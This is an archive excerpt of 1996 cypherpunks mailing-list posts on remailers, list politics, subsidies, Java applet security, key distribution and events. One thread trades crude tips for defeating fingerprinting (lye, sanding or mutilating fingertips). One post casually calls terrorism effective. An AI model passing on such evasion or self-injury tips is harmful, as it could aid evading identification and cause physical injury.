Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Be Good)
Date: Wed, 15 May 1996 19:35:57 +0800
To: cypherpunks@toad.com
Subject: Re: Defeating fingerprints
In-Reply-To: <199605141903.OAA05327@einstein.ssz.com>
Message-ID: <199605150643.XAA24223@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Forwarded message:
> 
> > With regards to filling in your own card, what about using a disappearing 
> > ink?? Then your prints would disappear! You could even do your name, 
> > right infront of them, and it would disappear, leaving these anynonomous 
> > prints behind!!
> 
> While the ink does become transparent/translucent I am shure the FBI chem
> lab won't have a problem finding traces of the chemical. This would make for
> jim dandy evidence in court.
> 
> > Or you could make an inkpad that is damp with sodium hydroxide (lye) 
> > instead of ink.  That way, you could lightly roll your fingers in it, 
> > like it was ink, and then wait a minute, and wipe it off.  That way, the 
> > only skin being eaten away, would be the ridges of the fingerprints.  Do 
> > this enought times, and the rigdes will end up the same height as the 
> > valleys, and will then essentially be flat.

Won't work.  Regular old soda lye is not really that corrosive to 
the skin.  I've handled plain lye many times and only hurts a
little if a grain gets up my fingernail.

> Burglars and safecrackers sand the ridges off.

This sounds like it'd work, but quite tedious.

>                                                          Jim Choate





-- 
		God grant me the serenity to accept
		the things I cannot change,
		the courage to change the things I can,
		and the wisdom to know the difference




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Be Good)
Date: Wed, 15 May 1996 19:58:36 +0800
To: cypherpunks@toad.com
Subject: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <Pine.GUL.3.93.960514222524.27098D-100000@Networking.Stanford.EDU>
Message-ID: <199605150708.AAA26485@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 14 May 1996, Keith Henson wrote:
> 
> > was to Krup.   I can't speak for all of them--actually, I can't speak
> > for *any* of them, but the ones who have said anything about the
> > recent uses of the remailers do not seem unhappy.  There may be
> > some discussion related to this on the cypherpunks mailing list.
> 
> Actually, there hasn't really been any discussion on cypherpunks, which I
> find a little surprising. I'd have thought that a remailer going down
> because of political/legal pressure would raise more of a ruckus. People
> seem jaded, but I'm not sure why.
> 
> I posted a half dozen articles to comp.org.eff.talk, more to stimulate
> discussion than to argue a position. We trolled up a statement from Hal
> Finney to the effect that remailers might need to be restricted in order
> to save them -- which I found to be rather provocative, but nobody said
> anything. Anybody?

The remailer capacity is quite underdone, there aren't really 
that many remailer servers out there.  Only TWO servers outside
the US.  Only ONE server making direct posts to netnews.  And
what, two or three nym servers?  Obviously this is severe 
undercapacity and we need to start up MUCH more servers and
FAST, ESPECIALLY in foriegn countries.

IMHO, trying to make it more user friendly to use remailers
is pointless considering the limited number of servers to use.

I'm CLUELESS about this stuff, I'd love to help, at least by
distributing code and exact intructions to make it as easy
as possible to encourage clueless types to start it up.

So what is the expense of setting up a full-featured server
like hacktic?  Mr. Graves should start up a new server, and
tcmay is rich, so he has no excuse.



-- 
		God grant me the serenity to accept
		the things I cannot change,
		the courage to change the things I can,
		and the wisdom to know the difference




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 15 May 1996 19:44:22 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: mailing list infrastructure
In-Reply-To: <199605142011.NAA29073@netcom7.netcom.com>
Message-ID: <Pine.SV4.3.91.960515001613.27798H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< Secret password sent by listserv, scheme >>

This is how it is done in the Philippines. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 15 May 1996 19:03:24 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SCO.3.91.960513134249.7157D-100000@grctechs.va.grci.com>
Message-ID: <Pine.LNX.3.93.960515003400.153E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Mark O. Aldrich wrote:

> On Mon, 13 May 1996, Senator Exon wrote:
> > i can fill out and manipulate the card myself i just need a
> > working method.
> > is there no privacy advocate who can help me?
> 
> You can mutilate the tips of your fingers so that prints cannot be 
> acquired, but this hurts.  Badly.

	I thought Old School bank robbers used sand paper to remove their
prints before a "job". Would this mung the prints enough?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 15 May 1996 18:33:24 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Negative side-effect of the coderpunks split
In-Reply-To: <Pine.SOL.3.91.960514135114.773T-100000@chivalry>
Message-ID: <199605150443.AAA00194@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> Ever since most of the hard crypto content moved to coderpunks, there have 
> been a lot of totally non-crypto political postings that make my skin 
> crawl.
[...]
> I kinda miss the Perrygrams :)

Well, there aren't going to be any more of them. Lots of people
complained.  "You're a fascist" they said. "We can post whatever we
want, and you can't stop us. Nya Nya Nya." The intellectual level of
of the counterarguments was more or less that possessed by six year
olds, but it didn't matter -- they not only claimed their right to
piss in the communal coffee pot if they wanted to, but they went on to
exercise this right. Well, now they all get to drink it.

Some of the people who couldn't help but take a leak in the well
whenever they passed it by got upset that coderpunks drew off all the
crypto talk. Well, actually, there was no crypto talk left.  It would
have been nice to keep one list, but some people insisted on
exercising their right to be stupid in public over and over again and
it got to be too much.

It used to be that I turned to cypherpunks first to get news of
breaking cryptography policy interest and breaking cryptography
information. Now there doesn't seem to be anyone left here who gives a
damn about cryptography -- even big news like MD5 getting nuked
doesn't make it above the noise levels.

I'm expecting that I'll unsubscribe from this thalidimide parody of a
cryptography mailing list within a few weeks. Perhaps I'll start an
alternative place to discuss cryptography policy that explicitly has
the policy of tossing off people who want to post irrelevancies.

I suppose then the rest of the crowd can just turn the filters up or
whatever it is claimed one is supposed to do to find something worth
reading in the cesspit.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Wed, 15 May 1996 19:45:54 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Why does the state still stand:
In-Reply-To: <199605150503.WAA23902@pacifier.com>
Message-ID: <199605150545.BAA23645@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> doing the collection.  In fact, I'll go so far as to say that it would 
> probably cost less than 10 cents to prevent the collection of $1 worth of 
> tax, and probably closer to a penny.  Any analysis of the destruction of the 
> state is incomplete without considering such a scenario.

That's why terrorism is so effective.  It only takes a few pounds of 
Sentex or C-4 to produce millions of dollars of damage.  It only takes 
the T's getting lucky *once* - we have to be lucky *all the time*.

Now, take that scenario and turn it around.  It only takes a little 
effort to frustrate the IRS, the FBI, or whoever your target happens to 
be.  The problem, however, is twofold - (1) the government will play mind 
games on the rest of the population to make you look like a terrorist, or 
whatever turns the populace against you, and (2) the government tends to 
use a sledgehammer to crack a walnut.  They don't care what kind of 
collateral damage they inflict (witness Waco and Ruby Ridge) as long as 
they can make their point.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 15 May 1996 18:30:32 +0800
To: mccoy@communities.com
Subject: Re: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <01I4PSMZ91SW8Y5ADD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mccoy@communities.com" 15-MAY-1996 00:55:57.23

>BTW, while there may have been a decent argument against the electrification
>act, I think that you are paddling upstream when it comes to net connections.
>The value of your net connection (or any connection to the net) _increases_
>according to the number of people who are connected to the network.  Unlike
>all of the other rural subsidies you pay for as an urban dweller (with the
>possible exception of the phone subsidy), this is one which has direct benefit
>to you.

	If it was a direct benefit, we'd chose it freely without being drafted
by the use of phone bills. Look at Juno et al - that's a circumstance in which
interconnection is taking place via the free market. Moreover, you're assuming
that there's some reason that I _want_ to be connected to those with
insufficient education, etcetera to move out of the rural areas we're talking
about. I know these places; I grew up in a town surrounded by hillbillies
(Middlesboro, KY). Believe me, I have no desire to have further contact with
them - via the net or any other method.

>Oh yeah, and you are already subsidizing their phone bill (at least the
>increased cost of running a line out to them and maintaining that line), and
>their electricity bill, and satellite TV took care of any need to run cable
>TV lines out there or else you would also be subsidizing their cable TV by
>now.  So what was your point?

	My tax dollars (and that's what the proposed phone bill changes
are in many ways - they're government requirements for people to pay money) are
also paying for a lot of other things I don't approve of, such as the drug war.
This isn't a reason to fund more of it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 15 May 1996 22:23:56 +0800
To: Cypherpunks@toad.com
Subject: Java & signed applets
Message-ID: <01I4PWRN40EO8Y5DM8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This has some mention of signed applets et al, so I thought it was
applicable.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 11-MAY-1996 23:06:27.24
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sat, 11 May 1996 15:59:13 -0400 (EDT)
From: "Home Page Press, Inc." <staff@hpp.com>
To: staff@hpp.com
Subject: JAVA BLACK WIDOWS - SUN DECLARES WAR

JAVA BLACK WIDOWS - SUN DECLARES WAR

Sun Microsystems' has declared war on Black Widow Java
applets on the Web. This is the message from Sun in response
to an extensive Online Business Consultant (OBC/May 96)
investigation into Java security.

OBC's investigation and report was prompted after renowned
academics, scientists and hackers announced Java applets
downloaded from the WWW presented grave security risks for
users. Java Black Widow applets are hostile, malicious traps set
by cyberthugs out to snare surfing prey, using Java as their technology.
OBC received a deluge of letters asking for facts after OBC
announced a group of scientists from Princeton University, Drew
Dean, Edward Felten and Dan Wallach, published a paper declaring
"The Java system in its current form cannot easily be made secure."
The paper can be retrieved at
http://www.cs.princeton.edu/sip/pub/secure96.html.

Further probing by OBC found that innocent surfers on the Web who
download Java applets into Netscape's Navigator and Sun's
HotJava browser, risk having "hostile" applets interfere with their
computers (consuming RAM and CPU cycles). It was also discovered
applets could connect to a third party on the Internet and, without the
PC owner's knowledge, upload sensitive information from the user's
computer. Even the most sophisticated firewalls can be penetrated . . .
"because the attack is launched from behind the firewall," said the
Princeton scientists.

One reader said, "I had no idea that it was possible to stumble on
Web sites that could launch an attack on a browser."  Another said,
"If this is allowed to get out of hand it will drive people away from the
Web. Sun must allay fears."

The response to the Home Page Press hostile applet survey led to the
analogy of Black Widow; that the Web was a dangerous place where
"black widows" lurked to snare innocent surfers. As a result the
Princeton group and OBC recommended users should "switch off"
Java support in their Netscape Navigator browsers. OBC felt that Sun
and Netscape had still to come clean on the security issues. But
according to Netscape's Product Manager, Platform, Steve Thomas,
"Netscape wishes to make it clear that all known security problems with
the Navigator Java and JavaScript environment are fixed in Navigator
version 2.02."

However, to date, Netscape has not answered OBC's direct questions
regarding a patch for its earlier versions of Navigator that supported
Java . . . the equivalent of a product recall in the 3D world. Netscape
admits that flaws in its browsers from version 2.00 upwards were
related to the Java security problems, but these browsers are still in use
and can be bought from stores such as CompUSA and Cosco. A floor
manager at CompUSA, who asked not to be named, said "its news to
him that we are selling defective software. The Navigator walks off our
floor at $34 a pop."

OBC advised Netscape the defective software was still selling at
software outlets around the world and asked Netscape what action was
going to be taken in this regard. Netscape has come under fire recently
for its policy of not releasing patches to software defects; but rather
forcing users to download new versions. Users report this task to be a
huge waste of time and resources because each download consists of
several Mbytes. As such defective Navigators don't get patched.

OBC also interviewed Sun's JavaSoft security guru, Ms. Marianne Mueller,
who said "we are taking security very seriously and working on it very
hard." Mueller said the tenet that Java had to be re-written from scratch or
scrapped "is an oversimplification of the challenge of running executable
content safely on the web. Security is hard and subtle, and trying to build
a secure "sandbox" [paradigm] for running untrusted downloaded applets
on the web is hard."

Ms. Mueller says Sun, together with their JavaSoft (Sun's Java division)
partners, have proposed a "sandbox model" for security in which "we
define a set of policies that restrict what applets can and cannot do---these
are the boundaries of the sandbox. We implement boundary checks---when
an applet tries to cross the boundary, we check whether or not it's allowed
to. If it's allowed to, then the applet is allowed on its way. If not, the
system throws a security exception.

"The 'deciding whether or not to allow the boundary to be crossed' is the
research area that I believe the Princeton people are working on," said
Mueller. "One way to allow applets additional flexibility is if the applet
is signed (for example, has a digital signature so that the identity of the
applet's distributor can be verified via a Certificate Authority) then allow
the applet more flexibility.

 "There are two approaches: One approach is to let the signed applet
do anything. A second approach is to do something more complex and
more subtle, and only allow the applet particular specified capabilities.
Expressing and granting capabilities can be done in a variety of ways.

"Denial of service is traditionally considered one of the hardest security
problems, from a practical point of view. As [Java's creator] James
Gosling says, it's hard to tell the difference between an MPEG
decompressor and a hostile applet that consumes too many resources!
But recognizing the difficulty of the problem is not the same as 'passing
the buck.' We are working on ways to better monitor and control the
use (or abuse) of resources by Java classes. We could try to enforce
some resource limits, for example. These are things we are investigating.

"In addition, we could put mechanisms in place so that user interface
people (like people who do Web browsers) could add 'applet monitors'
so that browser users could at least see what is running in their browser,
and kill off stray applets. This kind of user interface friendliness (letting
a user kill of an applet) is only useful if the applet hasn't already grabbed
all the resources, of course."

The experts don't believe that the problem of black widows and hostile
applets is going to go away in a hurry. In fact it may get worse. The
hackers believe that when Microsoft releases Internet Explorer 3.00 with
support for Java, Visual Basic scripting and the added power of its
ActiveX technology, the security problem will become worse. 

"There is opportunity for abuse, and it will become an enormous
problem," said Stephen Cobb, Director of Special Projects for the
National Computer Security Association (NCSA). "For example, OLE
technology from Microsoft [ActiveX] has even deeper access to a
computer than Java does."

JavaSoft's security guru Mueller agreed on the abuse issue: "It's going
to be a process of education for people to understand the difference
between a rude applet, and a serious security bug, and a theoretical
security bug, and an inconsequential security-related bug. In the case of
hostile applets, people will learn about nasty/rude applet pages, and
those pages won't be visited. I understand that new users of the Web
often feel they don't know where they're going when they point and click,
but people do get a good feel for how it works, pretty quickly, and I
actually think most users of the Web can deal with the knowledge that
not every page on the web is necessarily one they'd want to visit.
Security on the web in some sense isn't all that different from security
in ordinary life. At some level, common sense does come into play.

"Many people feel that Java is a good tool for building more secure
applications. I like to say that Java raises the bar for security on the
Internet. We're trying to do something that is not necessarily easy, but
that doesn't mean it isn't worth trying to do. In fact it may be worth
trying to do because it isn't easy.  People are interested in seeing the
software industry evolve towards more robust software---that's the
feedback I get from folks on the Net."

# # #

The report above may be reprinted with credit provided as follows:

Home Page Press, Inc.,  http://www.hpp.com  and Online Business Consultant(tm)
Please refer to the HPP Web site for additional information about Java and OBC.
===========================================================
............Home Page Press, Inc.   http://www.hpp.com   home of Go.Fetch(tm)
........Free TEXT version - Online Business Today email: obt.text@hpp.com
....Free PDF version - Online Business Today email: obt.pdf@hpp.com
OBC / Online Business Consultant, $595/year email: obc@hpp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Thu, 16 May 1996 14:31:53 +0800
To: cypherpunks@toad.com (Do ya! Cypherpunk)
Subject: Securing CDROM from piracy
Message-ID: <199605142323.EAA00118@fountainhead.net>
MIME-Version: 1.0
Content-Type: text/plain


We have developed a multimedia resource that will be cut on a CD-ROM for
retailling. Since we don't have our own distributers newtwork we will be
collobarating with another firm for distribution. Is there any way of making
sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot 
duplicate the thing and start selling it without sharing the profit. Or 
alternatively is there any protocol we could follow that will ensure a fair
game?

Vipul
 

-- 

        .od8888bo.                              \|/
     .d%::::88::888b.       	     	       (@ @)
   .d888::::::::8:888%.   ------------------oOO-(_)-OOo-----------------
   88888:::::::88888::%.  You walk across with your flowers in your hand
  d888888:::88;888888::b       Trying to tell me no one understands
  888888888:888888888888   Trade in your hours for a hand full of dimes
  Y8888888::::::888888%P         Gonna make it baby in our prime.
  '8888888:::::::8888:%'  ----------------------------------------------
   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com
        '"Y88%B8P"'       ----------------------------------------------    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 16 May 1996 01:34:35 +0800
To: cypherpunks@toad.com
Subject: Leaflet for First Monday
Message-ID: <v03006607adbf6c0c4579@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Wed, 15 May 1996 12:32:45 +0200 (METDST)
From: Erik Barfoed <journals@inet.uni-c.dk>
Subject: Leaflet for First Monday
To: tony durham <tdurham@cix.compulink.co.uk>,
        robert hettinga <rah@shipwright.com>, ed krol <e-krol@uiuc.edu>,
        bonnie nardi <nardi@taurus.apple.com>, ian peter <ianp@peg.apc.org>,
        rich wiggins <rwwmaint@msu.edu>, vint cerf <vcerf@mci.net>,
        Ed Valauskas <g0094@applelink.apple.com>,
        Esther Dyson <edyson@eff.org>, Rishab Aiyer Ghosh <rishab@dxm.org>
MIME-Version: 1.0


Dear Everybody

Once again I forward you the plain text version of the First Monday
leaflet, which I kindly urge you to distribute.

Best regards

Pernille Hammels|
Editor
Journals Division
e-mail: journals@inet.uni-c.dk
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="fmleaf.txt"
Content-ID: <Pine.3.89.9605151245.A25943@inet.uni-c.dk>
Content-Description: Leaflet for First Monday


CALL FOR PAPERS


Editor-in-Chief
Edward J. Valauskas, Internet Mechanics, Chicago, IL, USA
(valauskas@firstmonday.dk)

Consulting Editor
Esther Dyson EDventure Holdings, New York, NY, USA (dyson@firstmonday.dk)

International Editor
Rishab Aiyer Ghosh, The Indian Techonomist, New Delhi, India
(ghosh@firstmonday.dk)

Editorial Board
Vinton G. Cerf, Senior, Vice-Presiden at MCI
Tony Durham, The Times Higher Education Supplement, UK
Robert A. Hettinga, Shipwright Development Corp., USA
Ed Krol, University of Illinois, USA
Bonnie Nardi, Apple Computer, USA
Ian Peter, Ian Peter and Associates
Cathsworth Island, Australia
Rich Wiggins, Michigan State University, USA

First Monday is a peer-reviewed journal on the Internet - about the
Internet. This
scientific journal expands the frontiers of academic publishing by
combining the
tradi-tional values of peer-reviewing and strict quality control with a new
way of
publishing on the World Wide Web.


Aim and Scope

The aim of First Monday is to publish original articles about the Internet
and the Global
Information Infrastructure. First Monday will:

-       follow the political and regulatory regimes affecting the Internet
-       examine the use of the Internet on a global scale, by analyzing
economic, technical,
        and social factors
-       analyze research and development of Internet software and hardware
-       study the use of the Internet in specific communities
-       report on standards
-       discuss the content of the Internet

First Monday will appear in three formats

1. Monthly Mail from a Mail Server
First Monday will appear first of all as an electronic mail posting from
the First Monday
listserver. This issue of First Monday will be sent to the subscribers on
the first monday
of every month as an ASCII text file. It will include all the articles of
each issue and
pointers to information resources located at various Web, Gopher, and other
sites.

2. Web Site
This is the place where subscribers - and newcomers - can read about the
journal, learn
how to subscribe, read previously published articles, and submit
manu-scripts and other
materials for publication. This Web Site will also provide access to
objects and files that
are part of the articles. These objects and files can be downloaded. All
back issues of
First Monday will also be available for downloading.

3. Annual CD-ROM
First Monday will also appear as an annual CD-ROM, containing all articles
published in
a given year. This CD-ROM will be offered at a low price to subscribers at
the end of the
year.

Will paper versions be available?
First Monday is an experiment in electronic publishing, exploring the
possibilities of
communicating in this Internet medium. At the insistence of subscribers, we
can offer
printing, but only on-demand.

Process

The flow of a typical article, from author to publication:

-       An author is contacted by an Editor to write an _article, or
-       An author submits an article to a Editor by electronic mail. The
article is
        forwarded by electronic mail to the Editorial Office in Chicago.
-       The Editorial Office starts the peer-review process by forwarding
the article to
        reviewers by electronic mail. The Editorial Office is responsible
for tracking the
        article, handling comments from editors and _reviewers to authors,
editing, and
        creating a final accepted article.
-       This initial peer-reviewing process is private.
-       Articles that are accepted for publication are distributed to all
subscribers in the
        monthly mail, and posted on the First Monday Web Site. The Web Site
version
        of the article is likely to contain objects (illustrations,
programs, and other digital
        items) that are not included in the monthly mailing of the plain
ASCII text.
-       All articles published in First Monday will be included in an
annual archival
        CD-ROM. This CD-ROM will be offered to subscribers at a low price.

How to submit articles

To submit an article to First Monday, simply send it _by electronic mail to
the Editorial
Office (Edward J. Valauskas), valauskas@firstmonday.dk.

Preference will be given to articles which take advantage of the Internet,
using graphics,
programs, HTML features and components, and other features not pos-sible in
print.

The text of the article (exclusive of any other objects like pictures,
tables et cetera) should
not exceed 30.000 characters.

Format

The manuscript must be in its final form, as a plain ASCII text, suited for
distribution in
the monthly e-mail. If an Internet resource is cited, just type in the URL.
_Manuscripts
can be marked up in HTML, as long as the tags are recognizable by most
popular Web
browsers.

Non-text objects, like pictures, programs, spreadsheets, audio files, and
full motion video
files, can be part of an article. These non-text objects must be forwarded
as binary files to
the Editorial Office. Non-text should conform to well established de facto
standards on the
net: PDF, GIF, JPEG et cetera.

Priority will be given to particular items of a high scientific standard,
and articles with a
relevant timeframe can be published at short notice as a rapid publication.

Only original papers written in English will be considered for publication.

Copyright

Authors submitting a paper to First Monday automatically agree to assign
copyright to
Munksgaard International Publishers if and when the manuscript is accepted for
publication.

The articles published in First Monday are protected by copyright, which covers
translation rights and the right to reproduce and distribute all of the
articles in the journal.

Authors submitting a paper to First Monday do so in the understanding that
online
publishing on the Internet is a new opportunity and challenge, but also a
step into a new
territory, where authors and publishers do not always have the means to
protect against
unauthorized copying or editing of copyright protected works.



--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 16 May 1996 06:19:50 +0800
To: cypherpunks@toad.com
Subject: Micro$oft Online Banking Strategy
Message-ID: <199605151423.HAA11700@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Extract from Micro$oft WinNews Volume 3, #17:

>>>>>>>

MICROSOFT ONLINE BANKING STRATEGY

Microsoft announced that 58 financial institutions have 
committed to offering online banking using Microsoft Money 
through a group of leading banking-software vendors and 
banking-processing companies. To further help banks build 
their online-banking services, Microsoft is readying 
software-component technology for performing secure, 
ATM-like transactions using popular World Wide Web browsers, 
including Microsoft Internet Explorer and Netscape 
Navigator. These tools to facilitate browser-based banking 
are scheduled to be available by the end of the year. In 
addition, the Microsoft Windows NT Server network operating 
system includes embedded support for Internet publishing, 
helping facilitate an end-to-end Internet banking solution.  
Press release:
http://www.microsoft.com/corpinfo/press/1996/may96
/hmbankpr.htm

<<<<<<<







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Smith" <msmith@rebound.slc.unisys.com>
Date: Thu, 16 May 1996 06:40:54 +0800
To: cypherpunks@toad.com
Subject: distributed keys
Message-ID: <199605151447.OAA17650@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


Has anyone heard of an algorithm for managing keys automatically in a 
distributed system?  

For instance, if some low level security were to be implemented in a
a networking stack where authentication was to be implemented, you would want
to have each node have it's own signature so that signature checking can 
take place when one node connects to another node.  The trick is then 
getting every node's keys distributed to every other node.

Here are some ideas that I had, but neither is very desireable:

-  Manual distribution.  User configures every node's key into every node.
   Configuration becomes a major hassle and mistakes are a pain to debug.
   An advantagous side effect is the user can configure which machines can 
   talk to which machines if they're feeling particularly facist.

-  At connection time, each node determines whether or not it has the other
   node's key.  If not, a symmetric key is generated via DH and public keys
   are exchanged.  The problem comes in if someone is spoofing the machine
   to begin with.  Then you'll have the wrong public key.  Chicken, egg.  
   Egg, chicken.  

-  Having a certifying node which every other node has the public key to and
   who has everyone else's public key.  Requests are made of this server.  
   The trick is making this server secure and forcing the user to devote
   resources to this endeavour.
   
Thoughts?

-- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 16 May 1996 05:07:20 +0800
To: cypherpunks@toad.com
Subject: DCSB: The FSTC Electronic Check Project
Message-ID: <v03006602adbf82e05990@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Notice the corrected reservation deadline date (now June 1st, 1996) :-)
Sorry about that...

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston

                               Presents

                              Frank Jaffe,
                      of The Bank of Boston and
          The Financial Services Technology Consortium (FSTC)


                  "The FSTC Electronic Check Project"


                        Tuesday, June 4, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Frank Jaffe is a Senior Systems Consultant in the Applied Technology Group at
the Bank of Boston.  Frank is currently the project manager for the FSTC
Electronic Check project which involves over 30 companies.  Frank has
played a leadership role in planning the amalgamation of Bank of Boston's five
major retail computer systems into a single, common software system; acting
as project leader for a new teller system, and leading the screen phone R&D
project in cooperation with Northern Telecom and Bellcore.


The FSTC Electronic Check project will develop an enhanced all-electronic
replacement to the paper check. Electronic checks will be used like paper
checks, by businesses and consumers, and will use existing inter-bank
clearing systems. Like its paper counterpart, the Electronic Check
represents a self contained "information object," which has all of the
information necessary to complete a payment. Likewise, paper checkbooks are
replaced by portable Electronic Checkbooks; pens & signatures are replaced
by signature card functions and digital signatures using advanced
cryptographic techniques; stamps and envelopes by electronic mail or other
communications options such as the World Wide Web over the Internet.

The fully automated processing capabilities of Electronic Checks opens the
possibility of other types of financial instruments, such as electronic
cashiers, travelers, and certified checks. Electronic check writing and
processing will be integrated into existing applications, from cash
registers to personal checkbook managers to large corporate accounting
systems, to greatly increase the convenience, and reduce the costs, of
writing, accepting, and processing checks.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, June 4, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have dress code: jackets and ties for men, and
"appropriate business attire" for women.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, June 1, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZnOlvgyLN8bw6ZVAQEm8gP/deJ/J0ncmiUTJo82jeGMRp38q+8u+/LH
zUZ3dgOCXFM9Nldni/EM0nKiRAgPJTqlcGkrE6Q44s2+ZSPtTiop2Tbx+3xoCW9t
zTeKoLoTLgcS7LYS1b/VpcJqN9+q7gGxqmyAd88yZei+i4ZHw6kUGB6MyeHMPq+t
CSrEOkkikXE=
=SWUd
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 16 May 1996 05:30:39 +0800
To: qut@netcom.com
